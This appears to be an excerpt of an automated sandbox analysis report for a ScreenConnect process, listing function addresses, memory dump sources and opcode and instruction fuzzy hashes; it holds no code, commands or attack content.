                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 22a6716e2ced84704328e7a72629de700fbe8b4a92237398313fb42f7397a90a
                                                                                                                                                                                                                                          • Instruction ID: b902c7ad574c8718e04c8663d9a3f4ffc34b8a89bd9afb68b38120df2cae5459
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22a6716e2ced84704328e7a72629de700fbe8b4a92237398313fb42f7397a90a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F41E2707402015BDB059F39D8A0A2EBBA6FFC9644B08C92BC4059F356EF74EC06C792
                                                                                                                                                                                                                                          Function 044D2C38 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 82e78618346f7c46cd6e4fcd406afea03eddbee7517cacc90026286323a42818
                                                                                                                                                                                                                                          • Instruction ID: 39a680cb466e02c2d84115e0c7e7c4e3bd0ea1ed43be1791009b80263fee97fa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82e78618346f7c46cd6e4fcd406afea03eddbee7517cacc90026286323a42818
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85513C307007018FDB24DF29D99495AB7F6FF893147148A6AD496DB7A8E770F805CB90
                                                                                                                                                                                                                                          Function 01F484C0 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 70264b3028a649581f504c575aa865c5017a58bfe1c0cdf71f5212ee0e3f4ae5
                                                                                                                                                                                                                                          • Instruction ID: 1e26993c2e742a8fad85d23267d09c5c5a75cd62679dfad7452931d86bb807f6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70264b3028a649581f504c575aa865c5017a58bfe1c0cdf71f5212ee0e3f4ae5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92510930600A01CFD734CF69D584956BBF2FF89364B244A5DE49A9B7A4DB31F806CB84
                                                                                                                                                                                                                                          Function 01F4B2F0 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 81222c905ffdf352ff2663fc8dccdb684c6549bf33ade800e1a033d7dd3fbf20
                                                                                                                                                                                                                                          • Instruction ID: 7801add6fe95b1f629c366753f37392ed24f49523890da28c91741e74f214895
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81222c905ffdf352ff2663fc8dccdb684c6549bf33ade800e1a033d7dd3fbf20
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8519F70E403099FDB05DFB8E854B9DBBB5FF89300F108969E404AB265DB74A945CFA0
                                                                                                                                                                                                                                          Function 01F4B2E0 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c635619ae27a8effdbefef6fc72af474aeaa8f653bedc74f2d967a771247e715
                                                                                                                                                                                                                                          • Instruction ID: b83332e334753e30b2d6f6706cc7f51b703621da4abac9aa613122cdf59f23d0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c635619ae27a8effdbefef6fc72af474aeaa8f653bedc74f2d967a771247e715
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44516E70E403099FDB04DFA8E854BDDBBB5FF89300F108959E404AB265EB74A946CF90
                                                                                                                                                                                                                                          Function 044D44D8 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 923e53c660c1f9e6441a6b1dd8dca56a93dedad30e6ced75b70a48b55d276668
                                                                                                                                                                                                                                          • Instruction ID: 77dcf37cf44df65689bb428c208a8002398b365556e9b86f4cb8748a7504942e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 923e53c660c1f9e6441a6b1dd8dca56a93dedad30e6ced75b70a48b55d276668
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7641D8706007018FDB34DF29D8A4A26B7F1BF89315B144A69D596DB7A4EB30F806CF81
                                                                                                                                                                                                                                          Function 01F4EF87 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 65a12624d13529441724a03d8b47fc4e8a4ccbfc0631d514c7417d6f57ff6046
                                                                                                                                                                                                                                          • Instruction ID: d1bf3b808a8aae99d99a076a6b9b0469942b6ee5d2759be40d1e3cc8ceae8056
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65a12624d13529441724a03d8b47fc4e8a4ccbfc0631d514c7417d6f57ff6046
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22415071E0021ADBEB14DFA9C880ADEBFB5EF88700F148129E509B7340DB75AD46CB91
                                                                                                                                                                                                                                          Function 044D42A8 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 254400652f84c4607a083023bc5fbb953ae51e4cbf089b975bb2dd457d4b7c0a
                                                                                                                                                                                                                                          • Instruction ID: a9c388d59af351170d5eb8f7459911b369acedc25a7df4a618d878dfc1ddaf6a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 254400652f84c4607a083023bc5fbb953ae51e4cbf089b975bb2dd457d4b7c0a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A411D707007018FDB24CF29D894A1ABBF6FF89364B148659D496DB7A5EB30F846CB50
                                                                                                                                                                                                                                          Function 01F47940 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1f7db785846e284f2e53a5a9f81b47c8c110d5bfa53cfeca4f3fac762ec9a49c
                                                                                                                                                                                                                                          • Instruction ID: 442cbd2eac78035ef772460c6f248c86c6253bc9bed8ed2dd5505d5fa58719b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f7db785846e284f2e53a5a9f81b47c8c110d5bfa53cfeca4f3fac762ec9a49c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8318F31F102058FEB14AFA9C454AAEFBF5EF89254F04846AE406E7364DB36DD018B90
                                                                                                                                                                                                                                          Function 01F49DA0 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 26b369c38beb73a189905a21847fe22d1fc30977d03537751a7070c543b6559e
                                                                                                                                                                                                                                          • Instruction ID: e3240501c64f4008126a204f3501db713d71aafd21459aae02b9cf0ae664c4da
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26b369c38beb73a189905a21847fe22d1fc30977d03537751a7070c543b6559e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B415830B102019FDB28DF69D854AAEBBF6FF88614B14456DE406EB3A4DF75AC04CB90
                                                                                                                                                                                                                                          Function 06351670 Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3300604123.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_6350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 892115f4e61396e84cae199dffee2f5133701f1fcbc74674335f6e51394289df
                                                                                                                                                                                                                                          • Instruction ID: 5c60f3166644cad46d1ba90b1dfee8ea4910392ad1c5f27cc55a8f9e09f4c53a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 892115f4e61396e84cae199dffee2f5133701f1fcbc74674335f6e51394289df
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E316935B002159FCB54EF7CC49466E76E6AFC8250B644039E80AEB354EF39DD028BD1
                                                                                                                                                                                                                                          Function 01F4EB02 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6c46eb74cb8f9ad98f67e4cfee3bea535e89ed3045dfac960fbd563b5506f98a
                                                                                                                                                                                                                                          • Instruction ID: e20ac10ea6ed04be9ae2849ee79753123b7747c13a1994ffe0da9ad28e3c8ba3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c46eb74cb8f9ad98f67e4cfee3bea535e89ed3045dfac960fbd563b5506f98a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C2124A690D7C09FD356CB2898A59D17F21FF5321070A80CBE484CF2A3E5299803C766
                                                                                                                                                                                                                                          Function 044D44CA Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3d310c367268708e6c32b1e5c482c7926e5d7717b5c2d4818722ea41522cf076
                                                                                                                                                                                                                                          • Instruction ID: 6d8d507f88ac322548b1626e3ea3ccb524122045abf91f421f53a47081ff7e1e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d310c367268708e6c32b1e5c482c7926e5d7717b5c2d4818722ea41522cf076
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD316E747006018FCB24DF68D8A456AB7F1FF89314B104A6AD586DB7A4E731F806CB41
                                                                                                                                                                                                                                          Function 01F4DC28 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 89ba0c79ec98ffec12b12c9b67eb57deef2d75444c91d34617becb674de4e366
                                                                                                                                                                                                                                          • Instruction ID: 4ea3d950245b8ba0148449e74f13772fb9e00b717c71047aaf2a53eaf989b211
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89ba0c79ec98ffec12b12c9b67eb57deef2d75444c91d34617becb674de4e366
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17316C70A00B018FD730CF69C888666BBF1EF95320B144B2DD1929B6A5D731E94ACF84
                                                                                                                                                                                                                                          Function 01F45300 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8af7fe4cb5e403cc672ebd9fe27cc5b288d2370d028371204f742758f393dad1
                                                                                                                                                                                                                                          • Instruction ID: 79feac2c45baddfcb0f61922af270a823bc2c691e3cb5c22ed9174ee7d0d771b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8af7fe4cb5e403cc672ebd9fe27cc5b288d2370d028371204f742758f393dad1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C53189B1D002099FCB14DFAAC444AEEFFF5EF88320F10846AD558A7250D779A546CFA0
                                                                                                                                                                                                                                          Function 044D2E80 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ffa1ccb2876b0090fbd21d1d85d4744a4fa9a54a92160151e9a98f167fdcb429
                                                                                                                                                                                                                                          • Instruction ID: a6726b9177f3a3f6000db531434d70463319f4afd90093a26562d84fe2d45502
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffa1ccb2876b0090fbd21d1d85d4744a4fa9a54a92160151e9a98f167fdcb429
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8310A306007018FCB38DF29E89865ABBF5FF85711B144A2EE466C76E4DB70E949DB90
                                                                                                                                                                                                                                          Function 01F4EB31 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 85f5207f1b20ba959022f41812807d62d1322790a96538659c855202f5fd3273
                                                                                                                                                                                                                                          • Instruction ID: d7ad190ed6e6b455b89d0c4b5d177d8185d10c33fd752c39e9ee088e66912dba
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85f5207f1b20ba959022f41812807d62d1322790a96538659c855202f5fd3273
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B421046190D3C14FD30ADB289895996FF69FB83214F1AC0DFD485CF1A3D6289807C762
                                                                                                                                                                                                                                          Function 01F46588 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9c4583d4967a5ee3e9652135132e15e660d1abcfaaacf49d3cf0c00dfe6e46eb
                                                                                                                                                                                                                                          • Instruction ID: bb15d17e63e57e80dd2bf3dd4c18a114d69196a9383aec4446d5aabbe0477038
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c4583d4967a5ee3e9652135132e15e660d1abcfaaacf49d3cf0c00dfe6e46eb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62311A70A00701CFD730DF2AC85496ABBF5EF8A324B148A29D456DB7A5DB31E946CF80
                                                                                                                                                                                                                                          Function 01F436B0 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7f440a9c7f6a01905a4dcd37a034e19dfc3f76f3184fcfb5af0a62dac71727c6
                                                                                                                                                                                                                                          • Instruction ID: 75cf59e52ada744007b165008c2ee96a6316e430c442821d7c16f737c92acc75
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f440a9c7f6a01905a4dcd37a034e19dfc3f76f3184fcfb5af0a62dac71727c6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D315574A04319DFCB04DFB4D94849EBFB5FF49225B1080AAD91ADB352DB359E02CB51
                                                                                                                                                                                                                                          Function 01F4DC38 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d508b4d677f85361807dbfd63dd3909adb6a764ddac1d0bca326c937de035d24
                                                                                                                                                                                                                                          • Instruction ID: a3b5fdd6427a304321de41b98265d6a6cb9c4aaa3a34a0830cf1fda29815145b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d508b4d677f85361807dbfd63dd3909adb6a764ddac1d0bca326c937de035d24
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A312670A00B05CFD730CF69D84866ABBF1EF99320B144B28D1969B6A5D771E94ACF84
                                                                                                                                                                                                                                          Function 01F490C8 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9cff3419c57432fc1897c38da1a84b7e23f0df0538852afcc9b99d15fa174a7b
                                                                                                                                                                                                                                          • Instruction ID: e99b3e82dba7e804ee744b90ec377eb8964b19a079759224603dbc2be75240ee
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cff3419c57432fc1897c38da1a84b7e23f0df0538852afcc9b99d15fa174a7b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA310630A00601CFD730CF29D88896BBBF1BF89224B144A2DD49ADB6A5D771E946CB91
                                                                                                                                                                                                                                          Function 01F4DDE0 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e7052124e103c5e0d24b1ee609d3aaeb0c66acc437adc59a4eb8877a45c948e3
                                                                                                                                                                                                                                          • Instruction ID: d088b048d10c70ce13640f0951074ac3b7889c1cee7d3df748998ce52d778b74
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7052124e103c5e0d24b1ee609d3aaeb0c66acc437adc59a4eb8877a45c948e3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73310730A00705CFD730DF6AC84466ABBF1EFA9324B144A29D5969B7A5DB31E946CF80
                                                                                                                                                                                                                                          Function 0143D688 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3277910641.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_143d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: fcbfe63ffd03ca85e450f2d087da13b026e30a4705201fb6b15849099052f019
                                                                                                                                                                                                                                          • Instruction ID: a4601092c96ba9474ee61162b3c7b681c745a92b23a30aa05f2504fc56a8db63
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcbfe63ffd03ca85e450f2d087da13b026e30a4705201fb6b15849099052f019
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0721F175900240DFDB06DF68D9C4B26BF65FBDC314F60856AE9090A266C33AD416DAA2
                                                                                                                                                                                                                                          Function 01F48C40 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0ab6c926fb65c15377a0c9e53d686167a9b10692ea51e6b0bfcd4c666c547435
                                                                                                                                                                                                                                          • Instruction ID: 67d04d124429d04593fb5fe5fd835070e4f1f680b01b16d6145d9f3a4939c47e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ab6c926fb65c15377a0c9e53d686167a9b10692ea51e6b0bfcd4c666c547435
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8210570B001015BEB04EB68D8906AEBB62EFD8200F14852FD505EF265DF35AD0687D1
                                                                                                                                                                                                                                          Function 01F4E1B8 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
